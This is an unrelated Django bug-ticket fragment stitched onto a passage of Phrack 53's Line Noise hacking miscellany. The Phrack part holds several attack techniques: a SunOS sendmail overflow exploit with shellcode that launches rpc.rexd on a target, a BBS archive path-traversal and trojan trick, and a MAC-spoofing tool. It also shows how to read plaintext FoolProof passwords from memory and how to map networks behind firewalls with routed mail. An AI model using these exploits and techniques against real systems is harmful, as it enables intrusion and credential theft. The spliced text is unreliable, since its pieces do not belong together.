for our customers and our customers are supposed to know their target audience. If we cant deliver the website which its target audience can see in its default language then something is wrong. I fixed this wrong by commenting out undesired code. Not very DRY. getting everybody, who face similar problem, extending their middleware is also not very DRY. Why would all those people have to repeat themselves? I still say that such setting option would be best way to solve this. If i cant change your mind about this - so be it. If im gonna be the only one to see sanity in this, then so be it - i know how to fix this. Just thought, that this would be nice minor improvement. Moving discussion to dev's comment:7 Changed 6 years ago by. The default language is defined as the language to fall back to when no suitable language can be found and since you have an English translation, there is a suitable one according to definitions. Making settings which breaks this behaviour is not in the interest of Django or developers using it (just another setting in an already long list). Instead of introducing a setting which is hardly used, a solution could be to refactor get_language_from_request into two distinct parts; this means you only have to override a very small function in LocaleMiddleware, which would not call the detection based on headers. It would not be hard to create a patch for this. comment:8 Changed 6 years ago by Milestone 1.3 deleted Its unclear why a new setting is required here. HTTP Header based language detection is performed by the Locale middleware; if you don't want the behavior that is implemented... don't use that middleware. Just remove it, or provide a different middleware. If you're referring to a different piece of code, you'll need to provide more specific details than "that part of the code". Regardless, this doesn't seem to me like something that should be handled as a setting.
https://code.djangoproject.com/ticket/15168
CC-MAIN-2017-26
refinedweb
1,497
62.78
Archived security papers and articles in various languages. ---[ Phrack -------------------------------------------------------------------------------- ---[ Phrack -------------------------------------------------------------------------------- ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 03 of 15 -------------------------[ P H R A C K 5 3 L I N E N O I S E --------[ Various 0x1>------------------------------------------------------------------------- On not being a moron in public - nihilis (In response to why cantor kick-banned someone off of #Phrack without warning: <cantor:#phrack> you were an idiot near me <cantor:#phrack> i hate that) I wouldn't think normally that this is an article which needs to be written. But as experience has shown, it may very well be. Several months ago I was on the IRC EFnet's channel #phrack and one of the users spouted a URL for a web page he and his cohorts had hacked. On it he had kindly sent salutations to everyone he knew and to Phrack. We, the other occupants of the channel all admitted that none of us spoke authoritatively in the magazine's behalf, but that we were confident that none of the editorial staff would appreciate being implicated in a felony by association. The user didn't seem to understand. The next day, when the user was asked to join some of the authorities at the local station-house for a short interview, I'm sure he wet his pants. The line of questioning was short: it merely established that he had not been the culprit in further attacks on the same host. The police released him uncharged. In discussions with him later on #Phrack, we weren't surprised to find that he had been apprehended. As things played out, the user clearly felt no crime had been committed: All he did was change a web page. He adamantly protested that he didn't do any damage, he didn't put in any backdoors, he didn't know that root's .rhosts contained four simple bytes: "+ +\n". Clearly this user didn't look very hard in what were apparently his several weeks of attempting to hack the site. Interestingly enough, I haven't seen this user on IRC since about a week after the episode. There are several morals to this story: Hacking is a felony. Any unauthorized access constitutes hacking. If you do hack something, don't be a moron about it. It's likely always been this way, but it's only been more recently I've been paying attention, I suspect: The advent of information availability and a rise in the number people for whom the net has always been "the norm" is producing a class of users who cannot think for themselves. As reliance upon scripted attacks increases, the number of people who personally possess technical knowledge decreases. Today I was lurking and watching the activity on #Phrack while tending to issues at work. The two largest discussions which come to mind are that SYN flooding cannot be prevented, even using the newest Linux kernel; and what 0x0D means and that, yes, it is interchangeable for 13 in a C program. For the latter, the opposing point of view was presented by "an experienced C programmer." This was actually a civil conversation. People in-the-know were actually a little more crude than necessary, and the groups in need of reeducation admitted faults without needing four reference sources and three IETF standards quoted. It was a good day. People these days seem generally unwilling to concede that someone else on the Internet has done their homework, has studied the standards, and has an advantage. They consider themselves experienced because they got an unpatched Windows NT to bring up the Blue Screen Of Death remotely using a program published four months ago. They hack web pages and put their names on it. They seem unwilling to read the code given to them to establish exactly what happens when the newest 0-day exploit runs. They do not find the holes. They seem generally more interested in fucking someone over (unaware of potential consequences) than in really solving any sort of technical problem. It's all a race, it's all a game, it's all a matter of who has the newest tools. I'm writing this now because I'm sick of that. I'm sick of people who think they're smart and are intent on making sure I know it by putting their feet in their mouths. I'm sick of people who persistently ignore advice given to them and get angry when the consequences happen. I'm sick of people who cannot contribute intelligently to a conversation. So here are some tips for the future: You're a lot more impressive if you say something right than if you say something wrong. Someone nearby may be able to verify your claim and may call you on it. You're a lot more impressive if you can do something effortlessly because you've done it before than if you bumble and stumble through an experience because you thought you could do it and were wrong. If you're caught in a lie, admit it. The people who caught you already know more than you do: If you continue to spout bullshit, they'll know that too. But do your homework. Don't let them catch you being an idiot twice. If you do something illegal, don't broadcast it. This is especially stupid. Chances are, someone will be looking for someone to blame soon. By announcing that you're responsible, you're inviting them to contact you. 0x2>------------------------------------------------------------------------- Portable BBS Hacking Extra tips for Amiga BBS systems ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ After reading Khelbin's article from Phrack 50 (article 03), it reminded me of the similar tricks I had learnt for Amiga BBS systems. So I decided to write a small article covering the Amiga specific things. As with Khelbin's article, the actual BBS software isn't particularly important since they mostly all work the same way in the respect of archivers. This trick can also be used on other users, but I'll cover that later in the article. Firstly, the Amiga supports patching. This means you can set up paths which point to the directories where your commands are held. The Amiga OS also automatically sets a path to the current directory. As far as I know, you can't stop it doing this, but you don't need to anyway, if you're smart. This firstly problem, relating to the patching of the current directory is more common than you might expect, since it's such a simple thing to overlook. What happens is this: The BBS receives a new file from you, and unarchives it to a temporary dir for whatever reason. It virus checks the files (or whatever) then it attempt to recompress the files. But, if your file contained an executable named the same as the BBS's archiver, it would call the one you uploaded, since the BBS would've CDed to the temp dir to rearchive the files. As you can imagine, you can use this to activate all sorts of trojans and viruses, as long as the virus checker doesn't recognize them. A good idea is to make sure your trojan calls the proper command as well, so the sysop doesn't notice immediately. The more observant sysops will have circumvented this problem by calling the archive with an absolute path, and/or using another method to rearchive the files, without having to CD into the temp dir. The second trick is very similar to Khelbin's method of hex-editing archives. The only difference is, on the Amiga, the backslash and slash are swapped. For example, you create a file containing a new password file for the BBS in question. > makedir temp/BBSData > copy MyBBSPasswords.dat temp/BBSData/userdata > lha -r a SomeFiles.lha temp For the makedir, make the "temp" dir name to be however long it needs to be when you overwrite the characters of it in the hex-editor. In this case, we need 4. Now, load the archive into a hex editor like FileMaster and find the string: "temp\BBSData\userdata" and change it to whatever you need, for example: "\\\\BBSData\userdata" which will unarchive 4 levels back from his temporary directory into the real BBSData dir. The only problem with this is that you need to know a little about the BBS's directory structure. But, if you intend to hack it, you should probably know that much anyway. You'll notice that within the archive, the slash and backslash are swapped. This is important to remember, since using the wrong one will mean your archive will fail to extract correctly. The article about this from Phrack 50 was for PCs, which use backslash for directory operations. The Amiga uses slash instead, but apart from that, the methods used in that article will work fine for Amiga archives. If you know the Sysop of the BBS has a program like UnixDirs installed, you can even use the ".." to get to the root dir. The only other way to do that is to use a ":", however, I am not sure if this works. I have a feeling LhA would barf. Luckily, since the Amiga isn't limited by 8.3 filename problems, you can traverse directories much easier than with the limit imposed on PC systems. The only real way the Sysop can fix this problem is by have his temp dir for unarchiving to be a device which has nothing important on it, like RAM:. That way, if the archive is extracted to RAM: and tries to step back 3 directories using "///", it'll still be in RAM: and won't screw with anything important. 0x3>------------------------------------------------------------------------- <++> EX/changemac.c /* * In P51-02 someone mentioned Ethernet spoofing. Here you go. * This tiny program can be used to trick some smart / switching hubs. * * AWL production: (General Public License v2) * * changemac version 1.0 (2.20.1998) * * changemac -- change MAC address of your ethernet card. * * changemac [-l] | [-d number ] [ -r | -a address ] * * -d number number of ethernet device, 0 for eth0, 1 for eth1 ... * if -d option is not specify default value is 0 (eth0) * * -h help for changemac command * * -a address address format is xx:xx:xx:xx:xx:xx * * -r set random MAC address for ethernet card * * -l list first three MAC bytes of known ethernet vendors * (this list is not compleet, anyone who know some more * information about MAC addresses can mail me) * * changemac does not change hardware address, it just change data in * structure of kernel driver for your card. Next boot on your computer will * read real MAC form your hardware. * * The changed MAC stays as long as your box is running, (or as long as next * successful changemac). * * It will not work if kernel is already using that ethernet device. In that * case you have to turn off that device (ifconfig eth0 down). * * I use changemac in /etc/rc.d/rc.inet1 (slackware, or redhat) just line * before ifconfig for ethernet device (/sbin/ifconfig eth0 ...) * * The author will be very pleased if you can learn something form this code. * * Updates of this code can be found on: * * * Sugestions and comments can be sent to author: * Milos Prodanovic <azdaja@galeb.etf.bg.ac.yu> */ #include <string.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <net/if.h> #include <unistd.h> struct LIST { char name[50]; u_char mac[3]; }; /* * This list was obtainted from vyncke@csl.sni.be, created on 01.7.93. */ struct LIST vendors[] = { {"OS/9 Network ",'\x00','\x00','\x00'}, {"BBN ",'\x00','\x00','\x02'}, {"Cisco ",'\x00','\x00','\x0C'}, {"Fujitsu ",'\x00','\x00','\x0E'}, {"NeXT ",'\x00','\x00','\x0F'}, {"Sytek/Hughes LAN Systems ",'\x00','\x00','\x10'}, {"Tektronics ",'\x00','\x00','\x11'}, {"Datapoint ",'\x00','\x00','\x15'}, {"Webster ",'\x00','\x00','\x18'}, {"AMD ? ",'\x00','\x00','\x1A'}, {"Novell/Eagle Technology ",'\x00','\x00','\x1B'}, {"Cabletron ",'\x00','\x00','\x1D'}, {"Data Industrier AB ",'\x00','\x00','\x20'}, {"SC&C ",'\x00','\x00','\x21'}, {"Visual Technology ",'\x00','\x00','\x22'}, {"ABB ",'\x00','\x00','\x23'}, {"IMC ",'\x00','\x00','\x29'}, {"TRW ",'\x00','\x00','\x2A'}, {"Auspex ",'\x00','\x00','\x3C'}, {"ATT ",'\x00','\x00','\x3D'}, {"Castelle ",'\x00','\x00','\x44'}, {"Bunker Ramo ",'\x00','\x00','\x46'}, {"Apricot ",'\x00','\x00','\x49'}, {"APT ",'\x00','\x00','\x4B'}, {"Logicraft ",'\x00','\x00','\x4F'}, {"Hob Electronic ",'\x00','\x00','\x51'}, {"ODS ",'\x00','\x00','\x52'}, {"AT&T ",'\x00','\x00','\x55'}, {"SK/Xerox ",'\x00','\x00','\x5A'}, {"RCE ",'\x00','\x00','\x5D'}, {"IANA ",'\x00','\x00','\x5E'}, {"Gateway ",'\x00','\x00','\x61'}, {"Honeywell ",'\x00','\x00','\x62'}, {"Network General ",'\x00','\x00','\x65'}, {"Silicon Graphics ",'\x00','\x00','\x69'}, {"MIPS ",'\x00','\x00','\x6B'}, {"Madge ",'\x00','\x00','\x6F'}, {"Artisoft ",'\x00','\x00','\x6E'}, {"MIPS/Interphase ",'\x00','\x00','\x77'}, {"Labtam ",'\x00','\x00','\x78'}, {"Ardent ",'\x00','\x00','\x7A'}, {"Research Machines ",'\x00','\x00','\x7B'}, {"Cray Research/Harris ",'\x00','\x00','\x7D'}, {"Linotronic ",'\x00','\x00','\x7F'}, {"Dowty Network Services ",'\x00','\x00','\x80'}, {"Synoptics ",'\x00','\x00','\x81'}, {"Aquila ",'\x00','\x00','\x84'}, {"Gateway ",'\x00','\x00','\x86'}, {"Cayman Systems ",'\x00','\x00','\x89'}, {"Datahouse Information Systems ",'\x00','\x00','\x8A'}, {"Jupiter ? Solbourne ",'\x00','\x00','\x8E'}, {"Proteon ",'\x00','\x00','\x93'}, {"Asante ",'\x00','\x00','\x94'}, {"Sony/Tektronics ",'\x00','\x00','\x95'}, {"Epoch ",'\x00','\x00','\x97'}, {"CrossCom ",'\x00','\x00','\x98'}, {"Ameristar Technology ",'\x00','\x00','\x9F'}, {"Sanyo Electronics ",'\x00','\x00','\xA0'}, {"Wellfleet ",'\x00','\x00','\xA2'}, {"NAT ",'\x00','\x00','\xA3'}, {"Acorn ",'\x00','\x00','\xA4'}, {"Compatible Systems Corporation ",'\x00','\x00','\xA5'}, {"Network General ",'\x00','\x00','\xA6'}, {"NCD ",'\x00','\x00','\xA7'}, {"Stratus ",'\x00','\x00','\xA8'}, {"Network Systems ",'\x00','\x00','\xA9'}, {"Xerox ",'\x00','\x00','\xAA'}, {"Western Digital/SMC ",'\x00','\x00','\xC0'}, {"Eon Systems (HP) ",'\x00','\x00','\xC6'}, {"Altos ",'\x00','\x00','\xC8'}, {"Emulex ",'\x00','\x00','\xC9'}, {"Darthmouth College ",'\x00','\x00','\xD7'}, {"3Com ? Novell ? [PS/2] ",'\x00','\x00','\xD8'}, {"Gould ",'\x00','\x00','\xDD'}, {"Unigraph ",'\x00','\x00','\xDE'}, {"Acer Counterpoint ",'\x00','\x00','\xE2'}, {"Atlantec ",'\x00','\x00','\xEF'}, {"High Level Hardware (Orion, UK) ",'\x00','\x00','\xFD'}, {"BBN ",'\x00','\x01','\x02'}, {"Kabel ",'\x00','\x17','\x00'}, {"Xylogics, Inc.-Annex terminal servers",'\x00','\x08','\x2D'}, {"Frontier Software Development ",'\x00','\x08','\x8C'}, {"Intel ",'\x00','\xAA','\x00'}, {"Ungermann-Bass ",'\x00','\xDD','\x00'}, {"Ungermann-Bass ",'\x00','\xDD','\x01'}, {"MICOM/Interlan [Unibus, Qbus, Apollo]",'\x02','\x07','\x01'}, {"Satelcom MegaPac ",'\x02','\x60','\x86'}, {"3Com [IBM PC, Imagen, Valid, Cisco] ",'\x02','\x60','\x8C'}, {"CMC [Masscomp, SGI, Prime EXL] ",'\x02','\xCF','\x1F'}, {"3Com (ex Bridge) ",'\x08','\x00','\x02'}, {"Symbolics ",'\x08','\x00','\x05'}, {"Siemens Nixdorf ",'\x08','\x00','\x06'}, {"Apple ",'\x08','\x00','\x07'}, {"HP ",'\x08','\x00','\x09'}, {"Nestar Systems ",'\x08','\x00','\x0A'}, {"Unisys ",'\x08','\x00','\x0B'}, {"AT&T ",'\x08','\x00','\x10'}, {"Tektronics ",'\x08','\x00','\x11'}, {"Excelan ",'\x08','\x00','\x14'}, {"NSC ",'\x08','\x00','\x17'}, {"Data General ",'\x08','\x00','\x1A'}, {"Data General ",'\x08','\x00','\x1B'}, {"Apollo ",'\x08','\x00','\x1E'}, {"Sun ",'\x08','\x00','\x20'}, {"Norsk Data ",'\x08','\x00','\x26'}, {"DEC ",'\x08','\x00','\x2B'}, {"Bull ",'\x08','\x00','\x38'}, {"Spider ",'\x08','\x00','\x39'}, {"Sony ",'\x08','\x00','\x46'}, {"BICC ",'\x08','\x00','\x4E'}, {"IBM ",'\x08','\x00','\x5A'}, {"Silicon Graphics ",'\x08','\x00','\x69'}, {"Excelan ",'\x08','\x00','\x6E'}, {"Vitalink ",'\x08','\x00','\x7C'}, {"XIOS ",'\x08','\x00','\x80'}, {"Imagen ",'\x80','\x00','\x86'}, {"Xyplex ",'\x80','\x00','\x87'}, {"Kinetics ",'\x80','\x00','\x89'}, {"Pyramid ",'\x80','\x00','\x8B'}, {"Retix ",'\x80','\x00','\x90'}, {'\x0','\x0','\x0','\x0'} }; void change_MAC(u_char *,int); void list(); void random_mac(u_char *); void help(); void addr_scan(char *,u_char *); int main(int argc, char ** argv) { char c; u_char mac[6] = "\0\0\0\0\0\0"; int nr = 0,eth_num = 0,nr2 = 0; extern char *optarg; if (argc == 1) { printf("for help: changemac -h\n"); exit(1); } while ((c = getopt(argc, argv, "-la:rd:")) != EOF) { switch(c) { case 'l' : list(); exit(1); case 'r' : nr++; random_mac(mac); break; case 'a' : nr++; addr_scan(optarg,mac); break; case 'd' : nr2++; eth_num = atoi(optarg); break; default: help(); exit(1); } if (nr2 > 1 || nr > 1) { printf("too many options\n"); exit(1); } } change_MAC(mac,eth_num); return (0); } void change_MAC(u_char *p, int ether) { struct ifreq devea; int s, i; s = socket(AF_INET, SOCK_DGRAM, 0); if (s < 0) { perror("socket"); exit(1); } sprintf(devea.ifr_name, "eth%d", ether); if (ioctl(s, SIOCGIFHWADDR, &devea) < 0) { perror(devea.ifr_name); exit(1); } printf("Current MAC is\t"); for (i = 0; i < 6; i++) { printf("%2.2x ", i[devea.ifr_hwaddr.sa_data] & 0xff); } printf("\n"); /* an ANSI C ?? --> just testing your compiler */ for(i = 0; i < 6; i++) i[devea.ifr_hwaddr.sa_data] = i[p]; printf("Changing MAC to\t"); /* right here i am showing how interesting is programing in C */ printf("%2.2x:%2.2x:%2.2x:%2.2x:%2.2x:%2.2x\n", 0[p], 1[p], 2[p], 3[p], 4[p], 5[p]); if (ioctl(s,SIOCSIFHWADDR,&devea) < 0) { printf("Unable to change MAC -- Is eth%d device is up?\n", ether); perror(devea.ifr_name); exit(1); } printf("MAC changed\n"); /* just to be sure ... */ if (ioctl(s, SIOCGIFHWADDR, &devea) < 0) { perror(devea.ifr_name); exit(1); } printf("Current MAC is: "); for (i = 0; i < 6; i++) printf("%X ", i[devea.ifr_hwaddr.sa_data] & 0xff); printf("\n"); close(s); } void list() { int i = 0; struct LIST *ptr; printf("\nNumber\t MAC addr \t vendor\n"); while (0[i[vendors].name]) { ptr = vendors + i; printf("%d\t=> %2.2x:%2.2x:%2.2x \t%s \n", i++, 0[ptr->mac], 1[ptr->mac], 2[ptr->mac], ptr->name); if (!(i % 15)) { printf("\n press enter to continue\n"); getchar(); } } } void random_mac(u_char *p) { srandom(getpid()); 0[p] = random() % 256; 1[p] = random() % 256; 2[p] = random() % 256; 3[p] = random() % 256; 4[p] = random() % 256; 5[p] = random() % 256; } void addr_scan(char *arg, u_char *mac) { int i; if (!(2[arg] == ':' && 5[arg] == ':' && 8[arg] == ':' && 11[arg] == ':' && 14[arg] == ':' && strlen(arg) == 17 )) { printf("address is not in spacified format\n"); exit(0); } for(i = 0; i < 6; i++) i[mac] = (char)(strtoul(arg + i*3, 0, 16) & 0xff); } void help() { printf(" changemac - soft change MAC address of your ethernet card \n"); printf(" changemac -l | [-d number ] [ -r | -a address ] \n"); printf(" before you try to use it just turn ethernet card off, ifconfig ethX down\n"); printf(" -d number number of ethernet device \n"); printf(" -h this help \n"); printf(" -a address address format is xx:xx:xx:xx:xx:xx \n"); printf(" -r set random generated address \n"); printf(" -l list first three MAC bytes of known ethernet vendors\n"); printf(" example: changemac -d 1 -a 12:34:56:78:9a:bc\n"); } /* EOF */ <--> 0x4>------------------------------------------------------------------------- The Defense Switched Network By: DataStorm <havok@tfs.net> This is an extremely shortened tutorial on the DSN. More information is available through the DoD themselves and various places on the Internet. If you have any comments or suggestions, feel free to e-mail me. ***THE BASICS OF THE DSN*** Despite popular belief, the AUTOVON is gone, and a new DCS communication standard is in place, the DSN, or Defense Switched Network. The DSN is used for the communication of data and voice between various DoD installations in six world theaters: Canada, the Caribbean, the Continental United States (CONUS), Europe, the Pacific and Alaska, and Southwest Asia. The DSN is used for everything from video-teleconferencing, secure and insecure data and voice, and any other form of communication that can be transmitted over wiring. It is made up of the old AUTOVON system, the European telephone system, the Japanese and Korean telephone upgrades, the Oahu system, the DCTN, the DRSN, the Video Teleconferencing Network, and more. This makes the DSN incredibly large, which in turn makes it very useful. (See the section TRICKS in this article for more information.) The DSN is extremely isolated. It is designed to function even when outside communication lines have been destroyed and is not dependent on any outside equipment. It uses its own switching equipment, lines, phones, and other components. It has very little link to the outside world, since in a bombing/war, civilian telephone may be destroyed. This aspect, of course, also means that all regulation of the DSN is done by the government itself. When you enter the DSN network, you are messing with the big boys. To place a call to someone in the DSN, you must first dial the DSN access number, which lets you into the network itself. From there you can dial any number within the DSN, as long as it is not restricted from your calling area or hone. (Numbers both inside and outside the DSN can be restricted from calling certain numbers). If you are part of the DSN, you may periodically get a call from an operator, wanting to connect you with another person in or out of the network. To accept, you must tell her your name and local base telephone extension, your precedence, and any other information the operator feels she must have from you at that time. (I'm not sure of the operators abilities or technologies. They may have ANI in all or some areas.) The DSN uses signaling techniques similar to Bell, with a few differences. The dial tone is the same on both networks; the network is open and ready. When you call or are being called, a DSN phone will ring just like a Bell phone, with one difference. If the phone rings at a fairly normal rate, the call is of average precedence, or "Routine." If the ringing is fast, it is of higher precedence and importance. A busy signal indicates that the line is either busy, or DSN equipment is busy. Occasionally you may hear a tone called the "preempt" tone, which indicates that your call was booted off because one of higher precedence needed the line you were connected with. If you pick up the phone and hear an odd fluctuating tone, this means that a conference call is being conducted and you are to be included. As on many other large networks, the DSN uses different user classes to distinguish who is better than who, who gets precedence and more calls and who does not. The most powerful user class is the "Special C2" user. This fortunate military employee (or hacker?) has virtually unrestricted access to the system. The Special C2 user identifies himself as that through a validation process. The next class of user is the regular "C2" user. To qualify, you must have the requirements for C2 communications, but do not have to meet the requirements for the Special C2 user advantages. (These are users who coordinate military operations, forces, and important orders.) The last type of user is insensitively called the "Other User." This user has no need for Specail C2 or C2 communications, so he is not given them. A good comparison would be "root" for Special C2, "bin" for C2, and "guest" for other. The network is fairly secure and technologically advanced. Secure voice is encrypted with the STU-III. This is the third generation in a line of devices used to make encrypted voice, which is NOT considered data over the DSN. Networking through the DSN is done with regular IP version 4, unless classified, in which case Secret IP Routing Network(SIPRNET) protocol is used. Teleconferencing can be set up by the installation operator, and video teleconferencing is a common occurrence. The DSN is better than the old AUTOVON system in speed and quality, which allows it to take more advantage of these technologies. I'm sure that as we progress into faster transmission rates and higher technology, we will begin to see the DSN use more and more of what we see the good guys using on television. Precedence on the DSN fits the standard NCS requirements, so I will not talk about it in great detail in this article. All I think I have to clear up is that DSN phones do NOT use A, B, C, and D buttons as the phones in the AUTOVON did for precedence. Precedence is done completely with standard DTMF for efficiency. A DSN telephone directory is not distributed to the outside, mainly because of the cost and lack of interest. However, I have listed the NPA's for the different theaters. Notice that the DSN only covers major ally areas. You won't be able to connect to Russia with this system, sorry. Keep in mind that each base has their own operator, who for the intra-DSN circuit, is reachable by dialing "0." Here is a word of advice: there ARE people who sit around all day and monitor these lines. Further, you can be assured these are specialized teams that work special projects at the echelons above reality. This means that if you do something dumb on the DSN from a location they can trace back to you, you WILL be imprisoned. AREA DSN NPA Canada 312 CONUS 312 Caribbean 313 Europe 314 Pacific/Alaska 315/317 S.W. Asia 318 The format for a DSN number is NPA-XXX-YYYY, where XXX is the installation prefix (each installation has at least one of their own) and YYYY is the unique number assigned to each internal pair, which eventually leads to a phone. I'm not even going to bother with a list of numbers; there are just too many. Check (my home page) for the official DSN directory and more information. DSN physical equipment is maintained and operated by a team of military specialists designed specifically for this task, (you won't see many Bell trucks around DSN areas). Through even my deepest research, I was unable to find any technical specifications on the hardware of the actual switch, although I suppose they run a commercial brand such as ESS 5. My resources were obscure in this area, to say the least. ***TRICKS*** Just like any other system in existence, the DSN has security holes and toys we all can have fun with. Here are a few. (If you find any more, drop me an e-mail.) * Operators are located on different pairs in each base; one can never tell before dialing exactly who is behind the other line. My best luck has been with XXX-0110 and XXX-0000. * To get their number in the DSN directory, DoD installations write to: HQ DISA, Code D322 11440 Isaac Newton Square Reston, VA 20190-5006 * Another interesting address: It seems that GTE Government Systems Corporation Information Systems Division 15000 Conference Center Drive Chantilly, VA 22021-3808 has quite a bit of involvement with the DSN and its documentation projects. ***IN CONCLUSION*** As the DSN grows, so does my fascination with the system. Watch for more articles about it. I would like to say a BIG thanks to someone who wishes to remain unknown, a special english teacher, and the DoD for making their information easy to get a hold of. 0x5>------------------------------------------------------------------------- Howdy, I have found a weakness in the password implementations of FoolProof. FoolProof is a software package used to secure workstations and LAN client machines from DoS and other lame-ass attacks by protecting system files (autoexec.bat, config.sys, system registry) and blocking access to specified commands and control panels. FoolProof was written by Smart Stuff software originally for the Macintosh but recently released for win3.x and win95. All my information pertains directly to versions 3.0 and 3.3 of both the 3.x and 95 versions but should be good for all early versions if they exist. I have spent some time playing with it. It is capable of modifying the boot sequence on win3.x machines to block the use of hot keys and prevent users from breaking out of autoexec. It also modifies the behavior of command.com so that commands can be verified by a database and anything deemed unnecessary or potentially malicious can be blocked (fdisk, format, dosshell?, dir, erase, del. defrag, chkdsk, defrag, undelete, debug, etc.). Its windows clients provide for a way to log into/out of FoolProof for privileged access by using a password or hot key assignment. The newer installation of 95 machines have a centralized configuration database that lives on our NetWare server. My first success with breaking FoolProof passwords came by using a hex editor to scan the windows swap file for anything that might be of interested. In the swap file I found the password in plain text. I was surprised but thought that it was something that would be simply unavoidable and unpredictable. Later though I used a memory editor on the machine (95 loves it when I do that) and found that FoolProof stores a copy of the user password IN PLAIN TEXT inside its TSR's memory space. To find a FoolProof password, simply search through conventional memory for the string "FOOLPROO" (I don't know what they did with that last "F") and the next 128 bytes or so should contain two plaintext passwords followed by the hot-key assignment. For some reason FoolProof keeps two passwords on the machine, the present one and a 'legacy' password (the one you used before you _thought_ it was changed). There exist a few memory viewers/editors but it isn't much effort to write something. Getting to a point where you can execute something can be difficult but isn't impossible. I found that it is more difficult to do this on the win3.x machines because FoolProof isn't compromised by the operating system it sits on top of; basically getting a dos prompt is up to you (try file manager if you can). 95 is easier because it is very simple to convince 95 that it should start up into Safe-Mode and then creating a shortcut in the StartUp group to your editor and then rebooting the machine (FoolProof doesn't get a chance to load in safe mode). I tried to talk to someone at SmartStuff but they don't seem to care what trouble their simple minded users might get into. They told me I must be wrong because they use 128 bit encryption on the disk. Apparently they don't even know how their own software works because the utility they provide to recover lost passwords requires some 32+ character master password that is hardwired into each installation. JohnWayne <john__wayne@juno.com> 0x6>------------------------------------------------------------------------- [ old skool dept. ] <++> EX/smrex.c /* * Overflow for Sunos 4.1 sendmail - execs /usr/etc/rpc.rexd. * If you don't know what to do from there, kill yourself. * Remote stack pointer is guessed, the offset from it to the code is 188. * * Use: smrex buffersize padding |nc hostname 25 * * where `padding` is a small integer, 1 works on my sparc 1+ * * I use smrex 84 1, play with the numbers and see what happens. The core * gets dumped in /var/spool/mqueue if you fuck up, fire up adb, hit $r and * see where your offsets went wrong :) * * I don't *think* this is the 8lgm syslog() overflow - see how many versions * of sendmail this has carried over into and let me know. Or don't, I * wouldn't :) * * P.S. I'm *sure* there are cleverer ways of doing this overflow. So sue * me, I'm new to this overflow business..in my day everyone ran YPSERV and * things were far simpler... :) * * The Army of the Twelve Monkeys in '98 - still free, still kicking arse. */ #include <stdio.h> int main(int argc, char **argv) { long unsigned int large_string[10000]; int i, prelude; unsigned long offset; char padding[50]; offset = 188; /* Magic numbers */ prelude = atoi(argv[1]); if (argc < 2) { printf("Usage: %s bufsize <alignment offset> | nc target 25\n", argv[0]); exit(1); } for (i = 6; i < (6 + atoi(argv[2])); i++) { strcat(padding, "A"); } for(i = 0; i < prelude; i++) { large_string[i] = 0xfffffff0; /* Illegal instruction */ } large_string[prelude] = 0xf7ffef50; /* Arbitrary overwrite of %fp */ large_string[prelude + 1] = 0xf7fff00c; /* Works for me; address of code */ for( i = (prelude + 2); i < (prelude + 64); i++) { large_string[i] = 0xa61cc013; /* Lots of sparc NOP's */ } /* Now the sparc execve /usr/etc/rpc.rexd code.. */ large_string[prelude + 64] = 0x250bcbc8; large_string[prelude + 65] = 0xa414af75; large_string[prelude + 66] = 0x271cdc88; large_string[prelude + 67] = 0xa614ef65; large_string[prelude + 68] = 0x291d18c8; large_string[prelude + 69] = 0xa8152f72; large_string[prelude + 70] = 0x2b1c18c8; large_string[prelude + 71] = 0xaa156e72; large_string[prelude + 72] = 0x2d195e19; large_string[prelude + 73] = 0x900b800e; large_string[prelude + 74] = 0x9203a014; large_string[prelude + 75] = 0x941ac00b; large_string[prelude + 76] = 0x9c03a104; large_string[prelude + 77] = 0xe43bbefc; large_string[prelude + 78] = 0xe83bbf04; large_string[prelude + 79] = 0xec23bf0c; large_string[prelude + 80] = 0xdc23bf10; large_string[prelude + 81] = 0xc023bf14; large_string[prelude + 82] = 0x8210203b; large_string[prelude + 83] = 0xaa103fff; large_string[prelude + 84] = 0x91d56001; large_string[prelude + 85] = 0xa61cc013; large_string[prelude + 86] = 0xa61cc013; large_string[prelude + 87] = 0xa61cc013; large_string[prelude + 88] = 0; /* And finally, the overflow..simple, huh? :) */ printf("helo\n"); printf("mail from: %s%s\n", padding, large_string); } <--> 0x7>------------------------------------------------------------------------- Practical Sendmail Routing Intro: This article will be short and sweet as the concept and methodology are quite simple. UUCP Style routing has been around longer than most newbie hackers, yet it is a foreign concept to them. In past years, Phrack has seen at least one article on using this method to route a piece of mail around the world and back to the base host. That article in Phrack 41 (Network Miscellany) by the Racketeer gave us a good outline as how to implement routed mail. I will recap that method and show a practical use for it. If you have any questions on the method for building the mail headers, read a book on UUCP or something. How to: In short, you want to create a custom route for a piece of email to follow. This single piece of mail will follow your desired path and go through machines of your choice. Even with mail relaying turned off, MTAs will still past this mail as it looks at the mail and delivers only one hope at a time. The customized headers basically tell sendmail that it should only be concerned about the next target in the path, and to deliver. In our example below, we will have nine systems to be concerned about. Your base host, seven systems to bounce through, and the user on the final destination machine. host1 = origin of mail. base host to send from. host2 = second... host3 = third... (etc) host4 host5 host6 host7 host8 = final hop in our chain (i.e.: second to last) user @ dest = final resting place for mail Most people will wonder "why route mail, sendmail will deliver directly". Consider the first step in doing a penetration of a foreign network: Recon. A would-be attacker needs as much information about a remote host as possible. Have you ever sent mail to a remote system with the intention of bouncing it? If not, try it. You will find it a quick and easy way of finding out what version of what MTA the host is running. Knowing that the message will bounce with that information, think larger. Send mail to multiple hosts on a subnet and it will return the version information for each machine it bounces through. Think larger. Firewalls are often set up to allow mail to go in and out without a problem. So route your mail past the firewall, bounce it among several internal systems, then route the mail right back out the front door. You are left with a single piece of mail containing information on each system it bounced through. Right off, you can start to assess if the machines are running Unix or not among other things. So, with the example above, your mail 'to' will look like this: host3!host4!host5!host6!host7!host8!dest!user@host2 I know. Very weird as far as the order and placement of each. If you don't think it looks right, go reference it. Goal: The desired outcome of this mail is to return with as much information about the remote network as possible. There are a few things to be wary of however. If the mail hits a system that doesn't know how to handle it, you may never see it again. Routing the mail through a hundred hosts behind a firewall is risky in that it may take a while to go through, and if it encounters problems you may not get word back to know where it messed up. What I recommend is sending one piece of mail per host on the subnet. This can be scripted out fairly easy, so let this be a lesson in scripting as well. Theoretical Route 1: you --. firewall --. internal host1 --. | internal host2 --' firewall --' you --' Theoretical Route 2: If the internal network is on a different IP scheme than the external machines, (ie: address translation) then your mail will fail at the first hop by the above means. So, we can try an alternative of passing mail to both sides of the firewall in order. Of course, this would rely on knowledge of internal network numbering. If you are wondering how to get this, two ways come to mind. If you are one of those wacky 'white hat' ethical 